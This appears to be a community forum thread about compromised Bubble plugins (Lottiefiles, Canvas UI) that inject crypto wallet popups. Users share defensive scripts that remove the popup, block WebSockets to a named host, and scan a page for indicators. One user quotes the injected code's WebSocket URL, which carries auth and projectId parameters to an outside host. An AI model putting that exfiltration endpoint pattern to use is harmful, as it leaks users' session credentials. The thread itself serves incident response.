Megathread: Lottiefiles plugin / canvasUI compromised (crypto popups in apps)

Hey guys, my plugin 1T - Page Loader uses lottie as well as the Canvas UI plugin

4 Likes

Helpful info thanks

How can I remove the LottieFile? Some of my apps don’t use it at all and I can’t access the editor, not even through the direct URL.

In case anyone was looking for quick fixes (switching to a different CDN, for example), they all seem to have the same code injected.

This is partly why I’ll always die on the ‘avoid plugins if we can’ hill :laughing: Closely followed by the ‘download the plugin JS and save it with Bubble so it can’t be modified’ hill.

5 Likes

I’m having that problem as well, it seems like bubble has uninstalled every plugin for every user, my plugins are blank and it says 0 plugins installed, but it’s still showing.

Any risk to data, etc. from what you looked at?

It is not about lottie. Whatever, I got it on the main page, never used any of that. You guys simply delete lottie and refresh the page thinking the problem is solved. Placebo.

PUT THIS IN YOUR HEADER TO STOP

<script>
    document.addEventListener("DOMContentLoaded", function() {
        // Remove (or hide) an injected <w3m-modal> wallet popup
        function blockModal(modal) {
            modal.remove(); // Completely remove the modal
            // Or hide it with CSS:
            // modal.style.display = "none";
            console.warn("Blocked <w3m-modal> from displaying.");
        }
        document.querySelectorAll("w3m-modal").forEach(blockModal);

        // The popup is injected by plugin code that runs after DOMContentLoaded,
        // so watch the whole document for a <w3m-modal> being added or opened
        // instead of only looking once at load time
        const observer = new MutationObserver((mutations) => {
            mutations.forEach((mutation) => {
                if (mutation.type === "childList") {
                    mutation.addedNodes.forEach((node) => {
                        if (node.nodeType === Node.ELEMENT_NODE && node.localName === "w3m-modal") {
                            blockModal(node);
                        }
                    });
                } else if (mutation.type === "attributes" &&
                           mutation.target.localName === "w3m-modal" &&
                           mutation.target.classList.contains("open")) {
                    // contains() guard: an unconditional remove() rewrites the class
                    // attribute and re-triggers this observer in an endless loop
                    mutation.target.classList.remove("open");
                    console.warn("Removed 'open' class from <w3m-modal>");
                }
            });
        });
        observer.observe(document.documentElement, {
            childList: true, subtree: true, attributes: true, attributeFilter: ["class"]
        });
    });
</script>
5 Likes

Lottie can be used in several different plugins, but it’s not placebo - it’s literally in the code, you can see the LottieJS opening the crypto.

1 Like

I’d guess that’s just a temporary visual issue. It does not appear to be the case for my app or plugins.

Your usage of lottie can affect my bubble main page?

I have 28 issues, because of all plugins getting uninstalled, and everything editing-related is blank for me.
I can’t even uninstall any plugins, and it shows for me in the index page of bubble.io itself at:
https://www.bubble.io/

just leave the plugins and use that script

hey all, jumping in to let you all know the team is looking into this

2 Likes

It’s definitely in the Canvas UI Elements plugin.

1 Like

And this crypto script tries to send some data to an external website, so I’m very concerned about current user session auth information that could be sent outside (like auth & projectId data):

wss://castleservices01.com/ws/?auth=xxxxxxxxxxxxxx&projectId=xxxxxxx&ua=wc-2%xxxs-2.15.1%2Fmacos-chrome-130.0.0%2Fbrowser%3Abubble.io&useOnCloseEvent=true
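An added example (not code from the thread or from Bubble) for checking whether a page is affected: it scans script text for the two indicators reported above (the `w3m-modal` element and the `castleservices01.com` WebSocket host) and lists every `ws://`/`wss://` host a script contains, flagging those not on an allowlist. The allowlist and the sample scripts are constructed assumptions; `scanPage()` is meant to be pasted into the browser console on your own app.

```javascript
// Indicators quoted in this thread: the injected wallet popup element and the
// host the injected code opens a WebSocket to.
const INDICATORS = [
  { name: "wallet-popup-element", pattern: /w3m-modal/i },
  { name: "websocket-host-castleservices01", pattern: /castleservices01\.com/i },
];

// Hosts your app legitimately talks to over WebSocket (assumption: edit for your app)
const ALLOWED_WS_HOSTS = new Set(["bubble.io", "www.bubble.io"]);

// Pull every ws:// or wss:// literal out of a script and return the distinct hostnames
function extractWebSocketHosts(text) {
  const hosts = new Set();
  const re = /wss?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(text)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Scan one script's source text; suspicious if an indicator matches or an
// unknown WebSocket host appears
function scanScript(label, text) {
  const indicators = INDICATORS.filter((i) => i.pattern.test(text)).map((i) => i.name);
  const wsHosts = extractWebSocketHosts(text);
  const unknownWsHosts = wsHosts.filter((h) => !ALLOWED_WS_HOSTS.has(h));
  const suspicious = indicators.length > 0 || unknownWsHosts.length > 0;
  return { label, indicators, wsHosts, unknownWsHosts, suspicious };
}

// Browser only: scan inline scripts and fetch external ones (cross-origin scripts
// without CORS headers cannot be fetched and are scanned as empty text)
async function scanPage(doc = document) {
  const results = [];
  for (const s of doc.scripts) {
    const text = s.src ? await fetch(s.src).then((r) => r.text()).catch(() => "") : s.textContent;
    results.push(scanScript(s.src || "(inline)", text));
  }
  return results.filter((r) => r.suspicious);
}

// Constructed samples (not real plugin code): one clean script, one injected-looking script
const SAMPLE_CLEAN = "const ws = new WebSocket('wss://www.bubble.io/socket');";
const SAMPLE_INJECTED = "document.body.appendChild(document.createElement('w3m-modal'));" +
  "new WebSocket('wss://castleservices01.com/ws/?auth=' + token);";

if (typeof document === "undefined") {
  console.log(scanScript("clean.js", SAMPLE_CLEAN));
  console.log(scanScript("plugin.js", SAMPLE_INJECTED));
}
```

In the console, `await scanPage()` returns only the scripts worth a closer look; an empty array means neither indicator nor an unknown WebSocket host was found in the scripts that could be read.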

What’s happening lol… Don’t have lottie plugin installed and wallet is popping up everything

<script>
    (function() {
        // Store the original WebSocket constructor
        const OriginalWebSocket = window.WebSocket;
        const BLOCKED_HOST = "castleservices01.com";

        // Wrap the constructor in a Proxy: static constants (CONNECTING, OPEN,
        // CLOSING, CLOSED), the prototype and instanceof checks all keep working,
        // which reassigning .prototype on a plain function did not achieve
        window.WebSocket = new Proxy(OriginalWebSocket, {
            construct(target, args) {
                const url = String(args[0]); // a URL object is accepted as well
                let host = "";
                try { host = new URL(url, location.href).hostname; } catch (e) {}
                // Check if the URL targets the blocked domain (or a subdomain of it)
                if (host === BLOCKED_HOST || host.endsWith("." + BLOCKED_HOST)) {
                    console.warn("Blocked WebSocket connection to:", url);
                    // Throw rather than `return;`: a bare return from a constructor
                    // hands back an object with no send()/close(), so the caller
                    // fails later anyway, and a thrown error is visible in devtools
                    throw new DOMException("Blocked WebSocket connection to " + url, "SecurityError");
                }
                // Otherwise, proceed with the original WebSocket
                return Reflect.construct(target, args);
            }
        });
    })();
</script>

1T - Page Loader uses lottie as well as the Canvas UI plugin - uninstall both!

While I only spent about 30 seconds looking into what it was doing before removing it, it appeared that all connections to that wss were failing, at least on my computer, but I have significant security in place (PC & network).